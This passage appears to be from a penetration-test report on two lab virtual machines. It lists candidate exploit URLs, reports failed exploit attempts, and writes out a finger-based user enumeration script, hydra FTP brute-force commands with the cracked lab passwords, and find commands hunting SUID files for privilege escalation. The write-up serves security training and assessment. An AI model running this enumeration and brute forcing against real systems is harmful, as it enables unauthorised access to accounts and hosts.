Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit
2006-03-10;http://www.anyside.org/exp/exploits/remote/2006031002.txt;Dropbear
/ OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031901.txt;Mercur
Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031903.txt;Mercur
Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit
2006-06-05;http://www.anyside.org/exp/exploits/remote/2006060506.txt;Linux
Kernel < 2.6.16.18 (Netfilter NAT SNMP Module) Remote DoS Exploit
2006-07-23;http://www.anyside.org/exp/exploits/remote/2006072301.txt;Apache
Tomcat < 5.5.17 Remote Directory Listing Vulnerability
2006-08-21;http://www.anyside.org/exp/exploits/remote/2006082105.txt;Apache <
1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
2006-09-11;http://www.anyside.org/exp/exploits/remote/2006091101.txt;Mercur
Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)
2006-09-27;http://www.anyside.org/exp/exploits/remote/2006092701.txt;OpenSSH
<= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
2007-01-15;http://www.anyside.org/exp/exploits/remote/2007011502.txt;Mercur
Messaging 2005 IMAP Remote Buffer Overflow Exploit
2007-02-01;http://www.anyside.org/exp/exploits/remote/2007020107.txt;CA
BrightStor ARCserve 11.5.2.0 (catirpc.dll) RPC Server DoS Exploit
2007-02-23;http://www.anyside.org/exp/exploits/remote/2007022306.txt;Snort
2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit
2007-03-01;http://www.anyside.org/exp/exploits/remote/2007030102.txt;Snort
2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit
2007-03-10;http://www.anyside.org/exp/exploits/remote/2007031002.txt;MS
Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur
Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod)
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur
Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)
2007-03-24;http://www.anyside.org/exp/exploits/remote/2007032401.txt;Mercury
Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
2007-03-30;http://www.anyside.org/exp/exploits/remote/2007033002.txt;Snort
2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
2007-04-07;http://www.anyside.org/exp/exploits/remote/2007040701.txt;Apache
Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
2007-04-15;http://www.anyside.org/exp/exploits/remote/2007041501.txt;MS
Windows DNS RPC Remote Buffer Overflow Exploit (port 445)
2007-05-26;http://www.anyside.org/exp/exploits/remote/2007052601.txt;Apache
2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
2007-05-30;http://www.anyside.org/exp/exploits/remote/2007053001.txt;Eudora
7.1.0.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day
2007-06-22;http://www.anyside.org/exp/exploits/remote/2007062201.txt;Apache
mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
2007-07-08;http://www.anyside.org/exp/exploits/remote/2007070801.txt;Apache
Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
2007-09-03;http://www.anyside.org/exp/exploits/remote/2007090301.txt;CCProxy
<= v6.2 Telnet Proxy Ping Overflow Exploit (meta)
2007-10-14;http://www.anyside.org/exp/exploits/remote/2007101401.txt;Apache
Tomcat (webdav) Remote File Disclosure Exploit
2007-10-21;http://www.anyside.org/exp/exploits/remote/2007102101.txt;Apache
Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
2007-12-18;http://www.anyside.org/exp/exploits/remote/2007121805.txt;MS
Windows Message Queuing Service RPC BOF Exploit (MS07-065)
2008-04-04;http://www.anyside.org/exp/exploits/remote/2008040401.txt;Sun
Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)
2008-04-06;http://www.anyside.org/exp/exploits/remote/2008040601.txt;Apache
Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
2008-06-30;http://www.anyside.org/exp/exploits/remote/2008063003.txt;Surgemail
39e-1 Post Auth IMAP Remote Buffer Overflow DoS
2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071701.txt;Debian

OpenSSH Remote SELinux Privilege Elevation Exploit (auth)


2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071702.txt;Bea
Weblogic Apache Connector Code Exec / Denial of Service Exploit
2008-07-18;http://www.anyside.org/exp/exploits/remote/2008071801.txt;Apache
mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
2008-08-11;http://www.anyside.org/exp/exploits/remote/2008081101.txt;Apache
Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability
2008-09-05;http://www.anyside.org/exp/exploits/remote/2008090501.txt;MicroTik
RouterOS <= 3.13 SNMP write (Set request) PoC
2008-09-05;http://www.anyside.org/exp/exploits/remote/2008090503.txt;MicroTik
RouterOS <= 3.13 SNMP write (Set request) PoC

While this list looks impressive in length, removing exploits that don't
match the operating system, don't match the software installed, don't
match the proper version or don't provide a privilege escalation leaves
only 3 exploits. The
....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM
mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit,
....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remo
te exploit for Apache + OpenSSL v0.9.6d and below. This exploit is
based upon the openssl-too-open exploit by Solar Eclipse and offers
more than 130 targets including various flavors of Linux. and 20050430;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd
SNMP proxy daemon format string exploit exploits.
ii. Exploits round 1
The 3 exploits found were downloaded and reviewed. The following
lists the exploits in the order they were attempted (from most to least
likely to work).
!

Snmppd SNMP proxy daemon format string exploit.


Reviewing the source code for this exploit reveals that this exploit
appears to match all of the required criteria. The code was
successfully compiled after making major modifications to the
source to fix syntax issues due to line wrapping/formatting defects.
The execution of the exploit was unsuccessful.

Remote exploit for Apache + OpenSSL v0.9.6d and below.


While the Apache version matches perfectly, the kernel version
2.4.20-8 is more commonly associated with a Red Hat 9.0
installation rather than a Red Hat 8.0 installation. The code was
successfully compiled after making minor modifications to the
source to provide missing openssl include files. The execution of
the exploit was unsuccessful.

ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root


exploit.

Reviewing the code for this exploit reveals that the exploit was
written in 1998. The possibility of this exploit being successful was
deemed to be very slim. The exploit was successfully compiled
after making minor modifications to the source to fix syntax issues
due to line wrapping/formatting defects. The execution of the
exploit was unsuccessful.
iii. Research via secwatch.org
Having exhausted the exploits known to the anyside.org site, the
secwatch.org site was used to continue the search. The search results
were quite extensive compared to the anyside.org list. However, the
only additional exploit located was the UW imapd IMAP 4.1 server.
iv. Exploits round 2
After quite an extensive review of possible exploits, only one additional
exploit was located. The UW imapd IMAP 4.1 server exploit.
!

UW imapd IMAP 4.1 server.


This exploit is meant for the 2001.315 version of the uw-imapd
service. The service was fingerprinted as UW Imapd 2001.315rh.
The rh addition to the version may indicate that Red Hat has
applied a patch to resolve the vulnerability. The code was
successfully compiled without issues. The execution of the exploit
was unsuccessful.

D. User discovery
i. Abuse of finger
The finger service running on port 79/tcp provides us with the ability
to brute force user names on the cptvm1 host. To accomplish this, a
shell script executing finger over a list of user names was
implemented. The list of user names was generated by googling for a
list of common user names. The VM running back|track3 did not have
a proper finger client installed so this command was executed from the
host machine under OSX.
The names of 18 users on the cptvm1 host were discovered.
Reviewing the output from the finger command reveals that of the 18
user accounts, only the root, user and postgres users have the
ability to login to a standard shell.
$ cat fingerListOfUserNames.sh
#!/bin/bash
while read userName; do
finger ${userName}@$1 >> "usersOn$1_RAW.txt"
done < $2

sed -e '/^finger:/d' -e "/^\[$1/d" "usersOn$1_RAW.txt" > "usersOn$1_FOUND.txt"


awk '/^Login:/ { print $2 }' "usersOn$1_FOUND.txt" | sort -u > "usersOn$1.txt"
$ fingerListOfUserNames.sh 192.168.1.200 usernames.txt
$ ls -alF
total 96
drwxr-xr-x
drwxr-xr-x
-rwxr-xr-x
-rw-r--r--rw-r--r--rw-r--r--rw-r--r--

7
11
1
1
1
1
1

matt
matt
matt
matt
matt
matt
matt

matt
matt
matt
matt
matt
matt
matt

238
374
291
3550
107
4699
26235

Feb
Feb
Feb
Feb
Feb
Feb
Feb

11
10
11
10
11
11
11

22:23
19:12
22:06
19:31
22:06
21:46
21:46

./
../
fingerListOfUserNames.sh*
usernames.txt
usersOn192.168.1.200.txt
usersOn192.168.1.200_FOUND.txt
usersOn192.168.1.200_RAW.txt

$ cat usersOn192.168.1.200.txt
adm
apache
daemon
ftp
lp
mail
nfsnobody
nobody
nscd
operator
postgres
root
rpc
rpcuser
sshd
user
uucp
vcsa

From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:

7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd,
operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
111/tcp
rpcbind
939/tcp
status

OpenSSH 4.3 (protocol 2.0)


2 (rpc #100000)
1 (rpc #100024)

E. Brute force password guessing


i. Discovery of password for user account
As various remote exploits have been unsuccessful, a brute force
attack against the password of the user and postgres accounts was
attempted. Typically, password guessing of user accounts is stifled
with configuration items like: locking user accounts after exceeding a
maximum number of login attempts or by providing an exponentially
increasing delay length between invalid login attempts. In the case of
the ftp service listening on port 21/tcp, neither of these techniques
was applied. The hydra utility was selected as it allows a list of user
names to be provided, a list of passwords to be provided and the
protocol to be used. The user accounts file was populated by taking
the user accounts configured to login within a standard shell. The root
user was removed from the list as the ftp service did not allow root
logins. The passwords list was located by googling for a list of the
most common passwords used.
The result of this attack was the discovery of the password, digital,
for the user account. The credentials were validated by sshing into
the ctpvm1 host. An unsuccessful attempt to login to the cptvm2 host
using the user name and password was also attempted.
bt user # cat usernames/cptvm1.users.txt
user
postgres
bt user # hydra -e n -L usernames/cptvm1.users.txt -P passwords/passwords.txt
192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-27 22:57:29
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per
task
[DATA] attacking service ftp on port 21

[STATUS] 402.00 tries/min, 402 tries in 00:01h, 139356 todo in 05:47h


[STATUS] 402.00 tries/min, 1206 tries in 00:03h, 138552 todo in 05:45h
[STATUS] 404.71 tries/min, 2833 tries in 00:07h, 136925 todo in 05:39h
[STATUS] 405.60 tries/min, 6084 tries in 00:15h, 133674 todo in 05:30h
[STATUS] 406.06 tries/min, 12588 tries in 00:31h, 127170 todo in 05:14h
[STATUS] 406.21 tries/min, 19092 tries in 00:47h, 120666 todo in 04:58h
[STATUS] 406.27 tries/min, 25595 tries in 01:03h, 114163 todo in 04:42h
[21][ftp] host: 192.168.1.200
login: user
password: digital
[STATUS] 406.33 tries/min, 32100 tries in 01:19h, 107658 todo in 04:25h
[STATUS] 406.34 tries/min, 38602 tries in 01:35h, 101156 todo in 04:09h
[STATUS] 406.36 tries/min, 45106 tries in 01:51h, 94652 todo in 03:53h
[STATUS] 406.40 tries/min, 51613 tries in 02:07h, 88145 todo in 03:37h
[STATUS] 406.43 tries/min, 58119 tries in 02:23h, 81639 todo in 03:21h
[STATUS] 406.46 tries/min, 64627 tries in 02:39h, 75131 todo in 03:05h
[STATUS] 406.47 tries/min, 71133 tries in 02:55h, 68625 todo in 02:49h
[STATUS] 406.49 tries/min, 77639 tries in 03:11h, 62119 todo in 02:33h
[STATUS] 406.50 tries/min, 84145 tries in 03:27h, 55613 todo in 02:17h
[STATUS] 406.53 tries/min, 90656 tries in 03:43h, 49102 todo in 02:01h
[STATUS] 406.53 tries/min, 97160 tries in 03:59h, 42598 todo in 01:45h
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-28 03:05:41
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd,
operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa
Username/password: user/digital
cptvm2 (192.168.1.104)

Operating system: Linux


Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
111/tcp
rpcbind
939/tcp
status

OpenSSH 4.3 (protocol 2.0)


2 (rpc #100000)
1 (rpc #100024)

ii. Discovery of password for cptvm1 and cptvm2 accounts


Upon the successful login to the cptvm1 host, the /etc/passwd file was
reviewed. This action provided all of the names for the user accounts
on the cptvm1 host. Two accounts of high interest, cptvm1 and
cptvm2, were identified. While researching the configuration of the
cptvm1 host, a brute force password guessing attack was launched
against the cptvm1 and cptvm2 users.
The initial attack had an incorrect switch in the command line (-f).
This switch instructs hydra to stop executing as soon as a valid user
name/password pair is found. As a result of the incorrect switch, a
second attack to discover the cptvm2 account password had to be
completed. The end result of the attacks were the discovery of the
cptvm1 and cptvm2 passwords (cptvm1/windows, cptvm2/linux).
The credentials were validated by sshing into the cptvm1 host via
using both accounts. Successful ssh connections were also established
to the cptvm2 host using the accounts. The /etc/passwd file on the
cptvm2 host was reviewed for accounts of interest.
bt ~ # cat usernames/cptvm1.users2.txt
cptvm1
cptvm2
bt ~ # hydra -e n -f -L usernames/cptvm1.users2.txt -P passwords/passwords.txt
192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 18:26:44
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per
task
[DATA] attacking service ftp on port 21
[STATUS] 416.00 tries/min, 416 tries in 00:01h, 139342 todo in 05:35h
[STATUS] 405.33 tries/min, 1216 tries in 00:03h, 138542 todo in 05:42h
[STATUS] 406.86 tries/min, 2848 tries in 00:07h, 136910 todo in 05:37h
[STATUS] 406.40 tries/min, 6096 tries in 00:15h, 133662 todo in 05:29h
The session file ./hydra.restore was written. Type "hydra -R" to resume
session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 20:38:12
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per
task
[DATA] attacking service ftp on port 21
[STATUS] 8410.00 tries/min, 8410 tries in 00:01h, 131348 todo in 00:16h
[STATUS] 3072.00 tries/min, 9216 tries in 00:03h, 130542 todo in 00:43h
[STATUS] 1549.71 tries/min, 10848 tries in 00:07h, 128910 todo in 01:24h
[STATUS] 151.78 tries/min, 12987 tries in 01:25h, 126771 todo in 13:56h
The session file ./hydra.restore was written. Type "hydra -R" to resume

session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:39
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per
task
[DATA] attacking service ftp on port 21
The session file ./hydra.restore was written. Type "hydra -R" to resume
session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:53
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per
task
[DATA] attacking service ftp on port 21
[STATUS] 22420.00 tries/min, 22420 tries in 00:01h, 117338 todo in 00:06h
[STATUS] 7740.67 tries/min, 23222 tries in 00:03h, 116536 todo in 00:16h
[STATUS] 3550.57 tries/min, 24854 tries in 00:07h, 114904 todo in 00:33h
[STATUS] 1873.47 tries/min, 28102 tries in 00:15h, 111656 todo in 00:60h
[STATUS] 1116.58 tries/min, 34614 tries in 00:31h, 105144 todo in 01:35h
[STATUS] 874.72 tries/min, 41112 tries in 00:47h, 98646 todo in 01:53h
[STATUS] 755.90 tries/min, 47622 tries in 01:03h, 92136 todo in 02:02h
[STATUS] 685.14 tries/min, 54126 tries in 01:19h, 85632 todo in 02:05h
[STATUS] 638.21 tries/min, 60630 tries in 01:35h, 79128 todo in 02:04h
[STATUS] 604.82 tries/min, 67135 tries in 01:51h, 72623 todo in 02:01h
[21][ftp] host: 192.168.1.200
login: cptvm1
password: windows
[STATUS] attack finished for 192.168.1.200 (valid pair found)
Hydra (http://www.thc.org) finished at 2009-01-28 23:04:25
bt ~ # hydra -e n -l cptvm2 -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-29 22:54:56
[DATA] 16 tasks, 1 servers, 69879 login tries (l:1/p:69879), ~4367 tries per
task
[DATA] attacking service ftp on port 21
[STATUS] 401.00 tries/min, 401 tries in 00:01h, 69478 todo in 02:54h
[STATUS] 401.00 tries/min, 1203 tries in 00:03h, 68676 todo in 02:52h
[STATUS] 403.43 tries/min, 2824 tries in 00:07h, 67055 todo in 02:47h
[STATUS] 405.00 tries/min, 6075 tries in 00:15h, 63804 todo in 02:38h
[STATUS] 405.77 tries/min, 12579 tries in 00:31h, 57300 todo in 02:22h
[STATUS] 406.02 tries/min, 19083 tries in 00:47h, 50796 todo in 02:06h
[STATUS] 406.17 tries/min, 25589 tries in 01:03h, 44290 todo in 01:50h
[STATUS] 406.22 tries/min, 32091 tries in 01:19h, 37788 todo in 01:34h
[STATUS] 406.26 tries/min, 38595 tries in 01:35h, 31284 todo in 01:18h
[STATUS] 406.28 tries/min, 45097 tries in 01:51h, 24782 todo in 01:01h
[21][ftp] host: 192.168.1.200
login: cptvm2
password: linux
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-30 00:47:01
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd

79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux

F. Research of cptvm1 and cptvm2 hosts


i. cptvm1
Various data was gathered pertaining to the permissions of files within
the system. Items of interest were files having permissions set to run
as root, files having permissions incorrectly set to allow anyone to
read/write/execute them and files owned by one of the accounts with a
known password.
The location of all files owned by the cptvm1, cptvm2 and user
accounts (accounts we have passwords for) were gathered. This may
provide the ability to access data or executables we normally should
not have privileges to.

[cptvm1@cptvm1 ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 -o -user


user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2ouseruser_200.txt

The locations of all files having read and execute permissions set for
other were gathered. This may provide the ability to read data or
execute tasks we normally should not have privileges to.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m
%u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_200.txt

The locations of all files that are owned by a group we have access to
and are readable or executable were gathered. This may provide the
ability to read data or execute tasks we normally should not have
privileges to.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group
cptvm1 -o -group cptvm2 -o -group user \) -printf "%m %u %g %h/%f\\n" >
~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2ogroupuser_200.txt

The locations of all files that are set to execute as the root user were
gathered. This will provide a list of executables that should be
researched for exploits.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m
%u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_200.txt

The information gathered during this phase was used mainly for exploit
research.
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s

6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux

ii. cptmv2
Various data was gathered pertaining to the kernel version and
permissions of files within the system. Items of interest were files
having permissions set to run as root, files having permissions
incorrectly set to allow anyone to read/write/execute them and files
owned by one of the accounts with a known password.
Up to this point, the specific version of the Linux kernel was not
known. To gather this information, the uname commands was used.
[cptvm1@localhost ~ ]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007
i686 i686 i386 GNU/Linux

The locations of all files owned by the cptvm1 and cptvm2 accounts

(accounts we have passwords for) were gathered. This may provide


the ability to access data or executables we normally should not have
privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 \)
-printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2_104.txt

The locations of all files having read and execute permissions set for
other were gathered. This may provide the ability to read data or
execute tasks we normally should not have privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf
"%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_104.txt

The locations of all files that are owned by a group we have access to
and are readable or executable were gathered. This may provide the
ability to read data or execute tasks we normally should not have
privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \(
-group cptvm1 -o -group cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typefa-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2_104.txt

The locations of all files that are set to execute as the root user were
gathered. This will provide a list of executables that should be
researched for exploits.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf
"%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_104.txt

The information gathered during this phase was used mainly for exploit
research. However, several files of interest were discovered. Namely,
the CISngtool (Center for Internet Security, Next Generation scoring
tool - http://www.cisecurity.org).
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
